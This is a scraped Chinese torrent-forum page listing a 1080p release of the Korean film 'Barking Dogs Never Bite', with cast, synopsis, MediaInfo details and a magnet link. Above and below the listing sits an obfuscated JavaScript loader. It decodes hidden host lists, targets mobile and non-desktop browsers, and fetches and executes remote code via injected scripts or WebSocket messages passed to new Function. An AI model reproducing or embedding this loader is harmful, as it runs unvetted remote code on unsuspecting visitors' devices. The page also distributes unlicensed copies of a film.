绑架门口狗[中文字幕].Barking.Dogs.Never.Bite.2000.1080p.BluRay.DTS.x265-10bit 9.57GB

版主小s 1月前 319

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 绑架门口狗 / Barking Dogs Never Bite

◎片 名 ????? ?

◎年 代 2000

◎产 地 韩国

◎类 别 喜剧

◎语 言 韩语

◎上映日期 2000-02-19(韩国)

◎IMDb链接 https://www.imdb.com/title/tt0269743/

◎豆瓣评分 7.5/10 (11163人评价)

◎豆瓣链接 https://movie.douban.com/subject/1401587/

◎片 长 110分钟

◎导 演 奉俊昊 Joon-ho Bong (id:1062919)

◎编 剧 奉俊昊 Joon-ho Bong (id:1062919)

宋志浩 Ji-ho Song (id:1433049)

孙泰雄 Derek Son (id:1346239)

◎演 员 李成宰 Sung-jae Lee (id:1050937)

裴斗娜 Doona Bae (id:1057004)

边希峰 Hie-bong Byeon (id:1180723)

金浩贞 Ho-jung Kim (id:1114573)

金雷夏 Roe-ha Kim (id:1213426)

高素熙 Su-hee Go (id:1394402)

林常树 Sang-soo Im (id:1045682)

曹敏焕 Min-hwan Cho (id:1280699)

赵星宇 Sung-woo Jo (id:1280698)

赵龙圭 Yong-kyou Cho (id:1329976)

李恩秀 Eun Soo Lee (id:1289663)

宋志浩 Ji-ho Song (id:1433049)

李庸基 Yong-Gi Lee (id:1314650)

◎标 签 奉俊昊 / 韩国 / 黑色幽默 / 韩国电影 / 裴斗娜 / 喜剧 / 2000 / 黑色

◎简 介

大学讲师元俊(李成宰 饰)因为不懂巴结上司而失去了晋升的机会,加上家中唠叨的妻子,都使他烦心不已。邻家的狗总是叫个不停,本来心烦意乱的他听到狗吠声后更加不耐烦了,竟然把人家的狗捉走了,藏在地牢里。邻居寻狗的启事第二天便张贴了出来。

秘书千男(裴斗娜 饰)看到了这则启事后便加入了寻狗的行列。她十分厌倦平日办公室的工作,只想有上电视的机会。

一次元俊又听到了狗吠声,当他到地牢一看时,他藏起来的那只狗不见了。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 72758016618407982480866757923036508314 (0x36BCAF2DA07E15094933092DF918B09A)

  4. Complete name : [email protected]BQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 9.57 GiB

  8. Duration : 1 h 50 min

  9. Overall bit rate : 12.4 Mb/s

  10. Movie name : Barking Dogs Never Bite 2000 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-23 10:22:10

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 50 min

  21. Bit rate : 10.9 Mb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.228

  31. Stream size : 8.39 GiB (88%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 50 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.17 GiB (12%)

  51. Title : Korean

  52. Language : Korean

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 45 min

  62. Bit rate : 13.4 kb/s

  63. Count of elements : 1205

  64. Stream size : 10.1 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 45 min

  76. Bit rate : 13.9 kb/s

  77. Count of elements : 1205

  78. Stream size : 10.4 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:07:07.761 : en:Chapter 02

  86. 00:17:35.304 : en:Chapter 03

  87. 00:28:04.892 : en:Chapter 04

  88. 00:39:09.681 : en:Chapter 05

  89. 00:48:34.453 : en:Chapter 06

  90. 01:00:17.948 : en:Chapter 07

  91. 01:10:04.575 : en:Chapter 08

  92. 01:19:13.165 : en:Chapter 09

  93. 01:29:43.461 : en:Chapter 10

  94. 01:37:34.140 : en:Chapter 11

  95. 01:44:45.112 : en:Chapter 12




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:0528D7187AAF2D765FB0EB036E8994F3EC834CB9

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};